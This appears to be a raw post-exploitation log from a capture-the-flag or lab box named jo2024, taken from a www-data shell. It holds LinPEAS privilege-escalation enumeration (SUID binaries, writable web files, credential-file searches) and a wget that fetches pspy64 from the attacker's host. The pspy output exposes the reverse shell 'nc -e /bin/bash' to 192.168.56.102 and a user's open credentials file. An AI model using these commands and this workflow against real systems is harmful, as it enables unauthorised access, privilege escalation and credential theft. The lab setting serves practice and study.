-rwsr-xr-- 1 root messagebus 51K Sep 16  2023 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 19K Jan 31  2023 /usr/lib/polkit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 301K Apr 21  2024 /usr/libexec/xscreensaver  --->  Solaris_11.x(CVE-2019-3010)/xscreensaver-auth

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root mail 23K Feb  4  2021 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 31K Mar 23  2023 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 43K Mar  2  2023 /usr/bin/crontab
-rwxr-sr-x 1 root _ssh 471K Jun 22 21:38 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 15K Feb 13  2021 /usr/bin/xtrlock (Unknown SGID binary)
-rwxr-sr-x 1 root shadow 79K Mar 23  2023 /usr/bin/chage
-rwxr-sr-x 1 root shadow 39K Sep 21  2023 /usr/sbin/unix_chkpwd
-rwsr-sr-x 1 root root 15K Apr 10  2024 /usr/lib/xorg/Xorg.wrap

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found

╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh:  0x0000000000000000=
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb:  0x0000000000000000=

╚ Parent process capabilities
CapInh:  0x0000000000000000=
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb:  0x0000000000000000=


Files with capabilities (limited to 50):
/usr/bin/slock cap_dac_override,cap_sys_resource=ep
/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so
/etc/ld.so.conf
Content of /etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/libc.conf
  - /usr/local/lib
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
  - /usr/local/lib/x86_64-linux-gnu
  - /lib/x86_64-linux-gnu
  - /usr/lib/x86_64-linux-gnu

/etc/ld.so.preload
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 20
drwxr-xr-x   2 root root 4096 Jul 26 18:10 .
drwxr-xr-x 107 root root 4096 Jul 29 16:15 ..
-rw-r--r--   1 root root  726 Apr  3  2022 bash_completion.sh
-rw-r--r--   1 root root 1908 Aug  9  2023 vte-2.91.sh
-rw-r--r--   1 root root  967 Aug  9  2023 vte.csh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d

╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root  3461 Mar 30  2023 sbin.dhclient
-rw-r--r-- 1 root root 11235 Jan 13  2023 usr.bin.evince
-rw-r--r-- 1 root root  3448 Mar 12  2023 usr.bin.man

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/vanity/.bash_history
/root/
/var/www

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)

╔══════════╣ Readable files belonging to root and readable by me but not world readable

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/run/apache2/socks
/run/lock
/run/lock/apache2
/tmp
/tmp/linpeas.sh
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/var/tmp
/var/www/html
/var/www/html/img
/var/www/html/index.php
/var/www/html/preferences.php
/var/www/picture
/var/www/picture/index.php
/var/www/picture/pictures_gallery

╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
  Group www-data:
/tmp/linpeas.sh



                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
                            ╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/local/bin/php-server.sh
/usr/bin/gettext.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2024-07-29+15:44:49.8360543200 /home/vanity/backup
2024-07-29+13:02:54.9355433810 /usr/local/bin/php-server.sh
2024-07-27+16:32:55.5585008100 /home/vanity/.local/mousepad.sh
2024-03-10+10:50:33.5946296020 /etc/grub.d/01_password
2024-03-10+10:46:58.6606743290 /etc/grub.d/10_linux
2024-03-09+12:28:44.1767430030 /etc/console-setup/cached_setup_terminal.sh
2024-03-09+12:28:44.1767430030 /etc/console-setup/cached_setup_keyboard.sh
2024-03-09+12:28:44.1767430030 /etc/console-setup/cached_setup_font.sh

╔══════════╣ Unexpected in root
/vmlinuz.old
/initrd.img
/initrd.img.old
/vmlinuz
/backup

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/journal/999b2e8f5f8e4a4d8b72e4ae41447126/system.journal
/backup/.dmrc
/backup/.Xauthority
/backup/.profile
/backup/.bashrc
/backup/.lesshst
/backup/.bash_logout
/backup/.xprofile
/backup/backup


╔══════════╣ Files inside /home/www-data (limit 20)

╔══════════╣ Files inside others home (limit 20)
/home/vanity/.local/mousepad.sh
/home/vanity/.dmrc
/home/vanity/.Xauthority
/home/vanity/user.txt
/home/vanity/.profile
/home/vanity/.cache/fontconfig/e13b20fdb08344e0e664864cc2ede53d-le64.cache-8
/home/vanity/.cache/fontconfig/CACHEDIR.TAG
/home/vanity/.cache/openbox/openbox.log
/home/vanity/.cache/lxsession/LXDE/run.log
/home/vanity/.bashrc
/home/vanity/.lesshst
/home/vanity/.bash_logout
/home/vanity/.xprofile
/home/vanity/backup
/var/www/html/logo-light.png
/var/www/html/preferences.php
/var/www/html/index.php
/var/www/html/img/facebook-white.png
/var/www/html/img/instagram-white.png
/var/www/html/img/volunteers.jpg

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)

╔══════════╣ Backup folders
-rwxr-xr-x 1 vanity vanity 557 Jul 29 15:44 /home/vanity/backup
-rwxr-xr-x 1 vanity vanity 557 Jul 29 15:44 /home/vanity/backup

drwxr-xr-x 2 root root 4096 Dec 19 01:41 /var/backups
total 2036
-rw-r--r-- 1 root root   71680 Jul 27 00:00 alternatives.tar.0
-rw-r--r-- 1 root root    1676 Mar 10  2024 alternatives.tar.1.gz
-rw-r--r-- 1 root root   61410 Jul 29 16:02 apt.extended_states.0
-rw-r--r-- 1 root root    6775 Jul 28 10:41 apt.extended_states.1.gz
-rw-r--r-- 1 root root    6679 Jul 26 19:08 apt.extended_states.2.gz
-rw-r--r-- 1 root root    6669 Jul 26 18:05 apt.extended_states.3.gz
-rw-r--r-- 1 root root    1070 Mar  9  2024 apt.extended_states.4.gz
-rw-r--r-- 1 root root       0 Jul 29 00:00 dpkg.arch.0
-rw-r--r-- 1 root root      32 Jul 28 00:00 dpkg.arch.1.gz
-rw-r--r-- 1 root root      32 Jul 27 00:00 dpkg.arch.2.gz
-rw-r--r-- 1 root root      32 Mar 10  2024 dpkg.arch.3.gz
-rw-r--r-- 1 root root     237 Jul 26 18:08 dpkg.diversions.0
-rw-r--r-- 1 root root     147 Jul 26 18:08 dpkg.diversions.1.gz
-rw-r--r-- 1 root root     147 Jul 26 18:08 dpkg.diversions.2.gz
-rw-r--r-- 1 root root     126 Mar  9  2024 dpkg.diversions.3.gz
-rw-r--r-- 1 root root     172 Jul 28 10:41 dpkg.statoverride.0
-rw-r--r-- 1 root root     120 Mar  9  2024 dpkg.statoverride.1.gz
-rw-r--r-- 1 root root     120 Mar  9  2024 dpkg.statoverride.2.gz
-rw-r--r-- 1 root root     120 Mar  9  2024 dpkg.statoverride.3.gz
-rw-r--r-- 1 root root 1185958 Jul 28 10:42 dpkg.status.0
-rw-r--r-- 1 root root  294047 Jul 27 15:59 dpkg.status.1.gz
-rw-r--r-- 1 root root  293708 Jul 26 19:08 dpkg.status.2.gz
-rw-r--r-- 1 root root   92656 Mar  9  2024 dpkg.status.3.gz


╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 191 Jul 26 18:13 /var/lib/sgml-base/supercatalog.old
-rw-r--r-- 1 root root 0 Mar  9  2024 /var/lib/systemd/deb-systemd-helper-enabled/timers.target.wants/dpkg-db-backup.timer
-rw-r--r-- 1 root root 61 Mar  9  2024 /var/lib/systemd/deb-systemd-helper-enabled/dpkg-db-backup.timer.dsh-also
-rw-r--r-- 1 root root 291 Mar  4  2015 /usr/share/themes/Breeze-ob/openbox-3/desk_hover.xbm.old
-rw-r--r-- 1 root root 273 Mar  4  2015 /usr/share/themes/Breeze-ob/openbox-3/desk.xbm.old
-rw-r--r-- 1 root root 291 Mar  4  2015 /usr/share/themes/Breeze-ob/openbox-3/desk_pressed.xbm.old
-rw-r--r-- 1 root root 438702 Feb 15  2023 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 194817 Oct  9  2020 /usr/share/doc/x11-common/changelog.Debian.old.gz
-rwxr-xr-x 1 root root 1513 Jan 23  2020 /usr/share/doc/libipc-system-simple-perl/examples/rsync-backup.pl
-rw-r--r-- 1 root root 14083 Feb  1  2024 /usr/lib/modules/6.1.0-18-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 14083 Jul 15 09:42 /usr/lib/modules/6.1.0-23-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 138 Mar 27  2023 /usr/lib/systemd/system/dpkg-db-backup.timer
-rw-r--r-- 1 root root 147 Mar 27  2023 /usr/lib/systemd/system/dpkg-db-backup.service
-rwxr-xr-x 1 root root 2569 May 11  2023 /usr/libexec/dpkg/dpkg-db-backup
-rw-r--r-- 1 root root 365 Jul 26 18:13 /etc/xml/polkitd.xml.old
-rw-r--r-- 1 root root 10151 Jul 26 18:13 /etc/xml/docbook-xml.xml.old
-rw-r--r-- 1 root root 673 Jul 26 18:11 /etc/xml/xml-core.xml.old
-rw-r--r-- 1 root root 1219 Jul 26 18:12 /etc/xml/sgml-data.xml.old
-rw-r--r-- 1 root root 3493 Jul 26 18:13 /etc/xml/catalog.old
-rwxr-xr-x 1 vanity vanity 557 Jul 29 15:44 /home/vanity/backup

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /etc/alternatives/regulatory.db: symbolic link to /lib/firmware/regulatory.db-debian
Found /var/lib/apt/listchanges.db: Berkeley DB (Hash, version 9, native byte-order)
Found /var/lib/dpkg/alternatives/regulatory.db: ASCII text


╔══════════╣ Web files?(output limit)
/var/www/:
total 16K
drwxr-xr-x  4 root     root     4.0K Jul 29 13:48 .
drwxr-xr-x 12 root     root     4.0K Jul 28 10:41 ..
drwxr-xr-x  3 www-data www-data 4.0K Jul 29 13:48 html
drwxr-xr-x  3 www-data www-data 4.0K Jul 29 16:01 picture

/var/www/html:
total 896K
drwxr-xr-x 3 www-data www-data 4.0K Jul 29 13:48 .

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 0 Mar 14  2023 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 root root 29 Feb  5  2023 /usr/lib/python3/dist-packages/numpy/f2py/tests/src/assumed_shape/.f2py_f2cmap
-rw-r--r-- 1 root root 82 Feb  5  2023 /usr/lib/python3/dist-packages/numpy/f2py/tests/src/f2cmap/.f2py_f2cmap
-rw-r--r-- 1 root root 58 Feb  5  2023 /usr/lib/python3/dist-packages/numpy/core/include/numpy/.doxyfile
-rw-r--r-- 1 root root 5290 Jul 12  2023 /etc/skel/.face
-rw-r--r-- 1 root root 220 Apr 23  2023 /etc/skel/.bash_logout
-rw------- 1 root root 0 Mar  9  2024 /etc/.pwd.lock
-rw-r--r-- 1 vanity vanity 35 Jul 29 13:48 /home/vanity/.dmrc
-rw-r--r-- 1 vanity vanity 220 Jul 29 13:48 /home/vanity/.bash_logout
-rw-r--r-- 1 root root 0 Dec 19 01:21 /run/network/.ifstate.lock
-rwx------ 1 vanity vanity 35 Dec 19 01:46 /backup/.dmrc
-rwx------ 1 vanity vanity 220 Dec 19 01:46 /backup/.bash_logout

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxrwxrwx 1 www-data www-data 823059 Sep  8 09:49 /tmp/linpeas.sh
-rwxr-xr-x 1 vanity vanity 557 Jul 29 15:44 /home/vanity/backup
-rw-r--r-- 1 root root 32 Jul 27 00:00 /var/backups/dpkg.arch.2.gz
-rw-r--r-- 1 root root 71680 Jul 27 00:00 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 32 Mar 10  2024 /var/backups/dpkg.arch.3.gz
-rw-r--r-- 1 root root 0 Jul 29 00:00 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 32 Jul 28 00:00 /var/backups/dpkg.arch.1.gz
-rw-r--r-- 1 root root 1676 Mar 10  2024 /var/backups/alternatives.tar.1.gz

╔══════════╣ Searching passwords in history files

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/grub.d/01_password
/etc/pam.d/common-password
/home/vanity/creds
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-311.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
  #)There are more creds/passwds files in the previous parent folder

/usr/lib/x86_64-linux-gnu/libsamba-credentials.so.1
/usr/lib/x86_64-linux-gnu/libsamba-credentials.so.1.0.0
/usr/share/doc/p7zip/DOC/MANUAL/cmdline/switches/password.htm
/usr/share/doc/xarchiver/images/password_dialog.png
/usr/share/help/C/evince/password.page
/usr/share/help/bg/evince/password.page
/usr/share/help/ca/evince/password.page
/usr/share/help/cs/evince/password.page
/usr/share/help/da/evince/password.page
/usr/share/help/de/evince/password.page
/usr/share/help/el/evince/password.page
/usr/share/help/en_GB/evince/password.page
/usr/share/help/es/evince/password.page
/usr/share/help/eu/evince/password.page
/usr/share/help/fi/evince/password.page
/usr/share/help/fr/evince/password.page
/usr/share/help/gl/evince/password.page
/usr/share/help/hu/evince/password.page
/usr/share/help/id/evince/password.page
/usr/share/help/it/evince/password.page
/usr/share/help/ja/evince/password.page
/usr/share/help/ko/evince/password.page
/usr/share/help/lv/evince/password.page
/usr/share/help/nl/evince/password.page
/usr/share/help/oc/evince/password.page
/usr/share/help/pl/evince/password.page
/usr/share/help/pt_BR/evince/password.page
/usr/share/help/ro/evince/password.page
/usr/share/help/ru/evince/password.page
/usr/share/help/sl/evince/password.page
/usr/share/help/sr/evince/password.page
/usr/share/help/sv/evince/password.page
/usr/share/help/te/evince/password.page
/usr/share/help/tr/evince/password.page
/usr/share/help/uk/evince/password.page
/usr/share/help/vi/evince/password.page
/usr/share/help/zh_CN/evince/password.page
/usr/share/help/zh_HK/evince/password.page
/usr/share/help/zh_TW/evince/password.page
/usr/share/icons/Adwaita/16x16/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/24x24/legacy/dialog-password.png
/usr/share/icons/Adwaita/24x24/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/32x32/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/48x48/legacy/dialog-password.png
/usr/share/icons/Adwaita/48x48/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/64x64/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/96x96/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/scalable/status/dialog-password-symbolic.svg
/usr/share/icons/HighContrast/16x16/status/dialog-password.png
/usr/share/icons/HighContrast/22x22/status/dialog-password.png
/usr/share/icons/HighContrast/24x24/status/dialog-password.png

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching passwords inside logs (limit 70)
Description: Set up users and passwords



                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
                                ╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r' 


www-data@jo2024:/tmp$ wget http://192.168.56.102:81/pspy64
wget http://192.168.56.102:81/pspy64
--2024-12-19 01:53:15--  http://192.168.56.102:81/pspy64
Connecting to 192.168.56.102:81... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===================>]   2.96M  --.-KB/s    in 0.05s   

2024-12-19 01:53:15 (60.1 MB/s) - ‘pspy64’ saved [3104768/3104768]

www-data@jo2024:/tmp$ ls
ls
linpeas.sh  pspy64
www-data@jo2024:/tmp$ chmod +x pspy64
chmod +x pspy64
www-data@jo2024:/tmp$ ./pspy64
./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/12/19 01:53:34 CMD: UID=33    PID=19941  | ./pspy64 
2024/12/19 01:53:34 CMD: UID=0     PID=19940  | 
2024/12/19 01:53:34 CMD: UID=0     PID=19569  | 
2024/12/19 01:53:34 CMD: UID=0     PID=3379   | 
2024/12/19 01:53:34 CMD: UID=0     PID=2835   | 
2024/12/19 01:53:34 CMD: UID=33    PID=2687   | /bin/bash 
2024/12/19 01:53:34 CMD: UID=33    PID=2686   | python3 -c import pty;pty.spawn("/bin/bash") 
2024/12/19 01:53:34 CMD: UID=33    PID=2684   | bash 
2024/12/19 01:53:34 CMD: UID=33    PID=2683   | sh -c nc -e /bin/bash 192.168.56.102 1234 
2024/12/19 01:53:34 CMD: UID=0     PID=1836   | 
2024/12/19 01:53:34 CMD: UID=33    PID=1562   | /usr/sbin/apache2 -k start 
2024/12/19 01:53:34 CMD: UID=33    PID=1561   | /usr/sbin/apache2 -k start 
2024/12/19 01:53:34 CMD: UID=33    PID=1560   | /usr/sbin/apache2 -k start 
2024/12/19 01:53:34 CMD: UID=33    PID=1558   | /usr/sbin/apache2 -k start 
2024/12/19 01:53:34 CMD: UID=33    PID=1358   | /usr/sbin/apache2 -k start 
2024/12/19 01:53:34 CMD: UID=33    PID=1357   | /usr/sbin/apache2 -k start 
2024/12/19 01:53:34 CMD: UID=33    PID=1263   | /usr/sbin/apache2 -k start 
2024/12/19 01:53:34 CMD: UID=33    PID=1260   | /usr/sbin/apache2 -k start 
2024/12/19 01:53:34 CMD: UID=33    PID=1257   | /usr/sbin/apache2 -k start 
2024/12/19 01:53:34 CMD: UID=1000  PID=1028   | /usr/libexec/gvfsd-trash --spawner :1.5 /org/gtk/gvfs/exec_spaw/0 
2024/12/19 01:53:34 CMD: UID=1000  PID=1017   | /usr/libexec/gvfs-afc-volume-monitor 
2024/12/19 01:53:34 CMD: UID=1000  PID=1013   | /usr/libexec/gvfs-mtp-volume-monitor 
2024/12/19 01:53:34 CMD: UID=1000  PID=1009   | /usr/libexec/gvfs-goa-volume-monitor 
2024/12/19 01:53:34 CMD: UID=1000  PID=1005   | /usr/libexec/gvfs-gphoto2-volume-monitor 
2024/12/19 01:53:34 CMD: UID=1000  PID=991    | /usr/libexec/gvfs-udisks2-volume-monitor 
2024/12/19 01:53:34 CMD: UID=1000  PID=961    | /usr/bin/gnome-keyring-daemon --foreground --components=pkcs11,secrets --control-directory=/run/user/1000/keyring 
2024/12/19 01:53:34 CMD: UID=1000  PID=959    | /usr/bin/gnome-keyring-daemon --start --foreground --components=secrets 
2024/12/19 01:53:34 CMD: UID=1000  PID=951    | /usr/libexec/at-spi2-registryd --use-gnome-session 
2024/12/19 01:53:34 CMD: UID=1000  PID=943    | /usr/libexec/xdg-desktop-portal-gtk 
2024/12/19 01:53:34 CMD: UID=0     PID=940    | fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/1000/doc 
2024/12/19 01:53:34 CMD: UID=1000  PID=934    | /usr/libexec/xdg-permission-store 
2024/12/19 01:53:34 CMD: UID=1000  PID=930    | /usr/libexec/xdg-document-portal 
2024/12/19 01:53:34 CMD: UID=1000  PID=921    | /usr/libexec/dconf-service 
2024/12/19 01:53:34 CMD: UID=1000  PID=920    | /usr/libexec/xdg-desktop-portal 
2024/12/19 01:53:34 CMD: UID=1000  PID=915    | /usr/lib/menu-cache/menu-cached /run/user/1000/menu-cached-:0 
2024/12/19 01:53:34 CMD: UID=1000  PID=891    | /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 11 --address=unix:path=/run/user/1000/at-spi/bus_0 
2024/12/19 01:53:34 CMD: UID=1000  PID=872    | /usr/libexec/at-spi-bus-launcher --launch-immediately 
2024/12/19 01:53:34 CMD: UID=1000  PID=855    | xdg-user-dirs-gtk-update 
2024/12/19 01:53:34 CMD: UID=1000  PID=852    | /usr/bin/mousepad /home/vanity/creds/credentials.txt 
2024/12/19 01:53:34 CMD: UID=1000  PID=851    | xscreensaver-systemd 
2024/12/19 01:53:34 CMD: UID=1000  PID=848    | parcellite 
2024/12/19 01:53:34 CMD: UID=1000  PID=847    | /usr/bin/ssh-agent -s 
2024/12/19 01:53:34 CMD: UID=1000  PID=840    | xscreensaver -no-splash 
2024/12/19 01:53:34 CMD: UID=1000  PID=839    | pcmanfm --desktop --profile LXDE 
2024/12/19 01:53:34 CMD: UID=1000  PID=832    | lxpanel --profile LXDE 
2024/12/19 01:53:34 CMD: UID=1000  PID=830    | lxpolkit 
2024/12/19 01:53:34 CMD: UID=1000  PID=827    | openbox --config-file /home/vanity/.config/openbox/lxde-rc.xml 
2024/12/19 01:53:34 CMD: UID=1000  PID=823    | /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f 
2024/12/19 01:53:34 CMD: UID=1000  PID=814    | /usr/libexec/gvfsd 
2024/12/19 01:53:34 CMD: UID=1000  PID=803    | /usr/bin/ssh-agent x-session-manager 
2024/12/19 01:53:34 CMD: UID=107   PID=756    | /usr/libexec/rtkit-daemon 
2024/12/19 01:53:34 CMD: UID=1000  PID=750    | /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2024/12/19 01:53:34 CMD: UID=1000  PID=740    | /usr/bin/lxsession -s LXDE -e LXDE 
2024/12/19 01:53:34 CMD: UID=1000  PID=738    | /usr/bin/pulseaudio --daemonize=no --log-target=journal 
2024/12/19 01:53:34 CMD: UID=1000  PID=723    | (sd-pam) 
2024/12/19 01:53:34 CMD: UID=1000  PID=722    | /lib/systemd/systemd --user 
2024/12/19 01:53:34 CMD: UID=0     PID=717    | lightdm --session-child 15 18 
2024/12/19 01:53:34 CMD: UID=33    PID=705    | /usr/sbin/apache2 -k start 
2024/12/19 01:53:34 CMD: UID=0     PID=654    | /usr/sbin/apache2 -k start 
2024/12/19 01:53:34 CMD: UID=0     PID=635    | /usr/lib/xorg/Xorg :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch 
2024/12/19 01:53:34 CMD: UID=0     PID=634    | /sbin/agetty -o -p -- \u --noclear - linux 
2024/12/19 01:53:34 CMD: UID=0     PID=601    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 
2024/12/19 01:53:34 CMD: UID=0     PID=573    | /usr/sbin/lightdm 
2024/12/19 01:53:34 CMD: UID=996   PID=565    | /usr/lib/polkit-1/polkitd --no-debug 
2024/12/19 01:53:34 CMD: UID=0     PID=522    | /sbin/wpa_supplicant -u -s -O DIR=/run/wpa_supplicant GROUP=netdev 
2024/12/19 01:53:34 CMD: UID=0     PID=520    | /usr/sbin/connmand -n 
2024/12/19 01:53:34 CMD: UID=0     PID=515    | /usr/libexec/udisks2/udisksd 
2024/12/19 01:53:34 CMD: UID=0     PID=511    | /lib/systemd/systemd-logind 
2024/12/19 01:53:34 CMD: UID=0     PID=510    | /usr/sbin/ofonod -n 
2024/12/19 01:53:34 CMD: UID=0     PID=508    | /usr/sbin/dundee -n 
2024/12/19 01:53:34 CMD: UID=100   PID=507    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2024/12/19 01:53:34 CMD: UID=0     PID=506    | /usr/sbin/cron -f 
2024/12/19 01:53:34 CMD: UID=0     PID=430    | dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3 
2024/12/19 01:53:34 CMD: UID=0     PID=343    | 
2024/12/19 01:53:34 CMD: UID=997   PID=276    | /lib/systemd/systemd-timesyncd 
2024/12/19 01:53:34 CMD: UID=0     PID=257    | /lib/systemd/systemd-udevd 
2024/12/19 01:53:34 CMD: UID=0     PID=233    | /lib/systemd/systemd-journald 
2024/12/19 01:53:34 CMD: UID=0     PID=190    | 
2024/12/19 01:53:34 CMD: UID=0     PID=189    | 
2024/12/19 01:53:34 CMD: UID=0     PID=142    | 
2024/12/19 01:53:34 CMD: UID=0     PID=137    | 
2024/12/19 01:53:34 CMD: UID=0     PID=134    | 
2024/12/19 01:53:34 CMD: UID=0     PID=133    | 
2024/12/19 01:53:34 CMD: UID=0     PID=132    | 
2024/12/19 01:53:34 CMD: UID=0     PID=131    | 
2024/12/19 01:53:34 CMD: UID=0     PID=130    | 
2024/12/19 01:53:34 CMD: UID=0     PID=129    | 
2024/12/19 01:53:34 CMD: UID=0     PID=128    | 
2024/12/19 01:53:34 CMD: UID=0     PID=59     | 
2024/12/19 01:53:34 CMD: UID=0     PID=58     | 
2024/12/19 01:53:34 CMD: UID=0     PID=53     | 
2024/12/19 01:53:34 CMD: UID=0     PID=48     | 
2024/12/19 01:53:34 CMD: UID=0     PID=47     | 
2024/12/19 01:53:34 CMD: UID=0     PID=46     | 
2024/12/19 01:53:34 CMD: UID=0     PID=44     | 
2024/12/19 01:53:34 CMD: UID=0     PID=38     | 
2024/12/19 01:53:34 CMD: UID=0     PID=37     | 
2024/12/19 01:53:34 CMD: UID=0     PID=36     | 
2024/12/19 01:53:34 CMD: UID=0     PID=35     | 
